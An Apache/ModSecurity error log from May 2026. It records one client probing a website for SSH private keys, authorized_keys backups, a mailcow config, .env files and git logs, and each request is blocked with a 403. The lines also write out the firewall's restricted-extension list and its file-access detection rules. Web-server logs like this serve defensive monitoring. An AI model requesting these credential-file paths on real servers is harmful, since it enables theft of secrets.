[Mon May 11 11:47:59.891537 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:64990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/templates/ssh/id_rsa.old"] [unique_id "agGlz74KNmD_mZ_vlf83VQAAAEk"]
[Mon May 11 11:48:01.092973 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:64990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlz74KNmD_mZ_vlf83VQAAAEk"]
[Mon May 11 11:48:01.122566 2026] [security2:error] [pid 1254328:tid 1254337] [client 185.177.72.9:64996] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/templates/ssh/id_rsa.old"] [unique_id "agGl0URdw2n9wv6Ai48HAAAAAIY"]
[Mon May 11 11:48:01.123596 2026] [security2:error] [pid 1254328:tid 1254337] [client 185.177.72.9:64996] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/templates/ssh/id_rsa.old"] [unique_id "agGl0URdw2n9wv6Ai48HAAAAAIY"]
[Mon May 11 11:48:02.406689 2026] [security2:error] [pid 1254328:tid 1254337] [client 185.177.72.9:64996] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGl0URdw2n9wv6Ai48HAAAAAIY"]
[Mon May 11 11:48:09.997089 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:6256] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/webhook/.ssh/authorized_keys.bak"] [unique_id "agGl2ZkIEwRJMyDaV55NWgAAAVU"]
[Mon May 11 11:48:09.998109 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:6256] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/webhook/.ssh/authorized_keys.bak"] [unique_id "agGl2ZkIEwRJMyDaV55NWgAAAVU"]
[Mon May 11 11:48:11.202652 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:6256] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGl2ZkIEwRJMyDaV55NWgAAAVU"]
[Mon May 11 11:48:11.230189 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:6272] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.ssh/authorized_keys.bak"] [unique_id "agGl25kIEwRJMyDaV55NXQAAAVg"]
[Mon May 11 11:48:11.234195 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:6272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.ssh/authorized_keys.bak"] [unique_id "agGl25kIEwRJMyDaV55NXQAAAVg"]
[Mon May 11 11:48:12.479101 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:6272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGl25kIEwRJMyDaV55NXQAAAVg"]
[Mon May 11 11:48:12.815501 2026] [autoindex:error] [pid 1256241:tid 1256269] [client 18.237.112.23:40280] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 11:48:12.993670 2026] [autoindex:error] [pid 1256241:tid 1256269] [client 18.237.112.23:40280] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 11:48:50.674909 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:61642] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agGmAmS6k_SCYd1AVZqtHQAAAQs"]
[Mon May 11 11:48:50.675499 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:61642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agGmAmS6k_SCYd1AVZqtHQAAAQs"]
[Mon May 11 11:48:52.033244 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:61642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmAmS6k_SCYd1AVZqtHQAAAQs"]
[Mon May 11 11:48:52.058514 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:61646] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agGmBBjZymfuKpjWXeh7DwAAANQ"]
[Mon May 11 11:48:52.059256 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:61646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agGmBBjZymfuKpjWXeh7DwAAANQ"]
[Mon May 11 11:48:53.281816 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:61646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmBBjZymfuKpjWXeh7DwAAANQ"]
[Mon May 11 11:48:55.438119 2026] [security2:error] [pid 1254328:tid 1254337] [client 124.156.200.4:35418] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.krakoukas.com"] [uri "/"] [unique_id "agGmB0Rdw2n9wv6Ai48HgQAAAIY"], referer: http://www.krakoukas.com
[Mon May 11 11:48:55.926577 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:29080] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/var/www/.env"] [unique_id "agGmB5kIEwRJMyDaV55NvwAAAUk"]
[Mon May 11 11:48:55.927450 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:29080] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/var/www/.env"] [unique_id "agGmB5kIEwRJMyDaV55NvwAAAUk"]
[Mon May 11 11:48:57.187486 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:29080] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmB5kIEwRJMyDaV55NvwAAAUk"]
[Mon May 11 11:48:57.215476 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:29082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/var/www/.env"] [unique_id "agGmCURdw2n9wv6Ai48HhQAAAJc"]
[Mon May 11 11:48:57.216096 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:29082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/var/www/.env"] [unique_id "agGmCURdw2n9wv6Ai48HhQAAAJc"]
[Mon May 11 11:48:58.625722 2026] [:error] [pid 1254179:tid 1254195] [client 31.44.8.142:44924] File does not exist: /home/ofcrysta/public_html/index.php
[Mon May 11 11:48:59.059097 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:29082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmCURdw2n9wv6Ai48HhQAAAJc"]
[Mon May 11 11:48:59.084387 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:29092] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/var/www/html/.env"] [unique_id "agGmC74KNmD_mZ_vlf83-QAAAFY"]
[Mon May 11 11:48:59.084617 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:29092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/var/www/html/.env"] [unique_id "agGmC74KNmD_mZ_vlf83-QAAAFY"]
[Mon May 11 11:49:00.444407 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:29092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmC74KNmD_mZ_vlf83-QAAAFY"]
[Mon May 11 11:49:00.470587 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:29094] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/var/www/html/.env"] [unique_id "agGmDL4KNmD_mZ_vlf83-wAAAEE"]
[Mon May 11 11:49:00.470798 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:29094] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/var/www/html/.env"] [unique_id "agGmDL4KNmD_mZ_vlf83-wAAAEE"]
[Mon May 11 11:49:01.901687 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:29094] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmDL4KNmD_mZ_vlf83-wAAAEE"]
[Mon May 11 11:49:01.929456 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:29100] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/logs/HEAD"] [unique_id "agGmDRjZymfuKpjWXeh7FgAAAMQ"]
[Mon May 11 11:49:01.929697 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:29100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/logs/HEAD"] [unique_id "agGmDRjZymfuKpjWXeh7FgAAAMQ"]
[Mon May 11 11:49:02.288981 2026] [security2:error] [pid 1254212:tid 1254227] [client 124.156.200.4:43122] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agGmDkYQeUtAPynIs6xXUAAAAA0"], referer: https://www.krakoukas.com/
[Mon May 11 11:49:03.311524 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:29100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmDRjZymfuKpjWXeh7FgAAAMQ"]
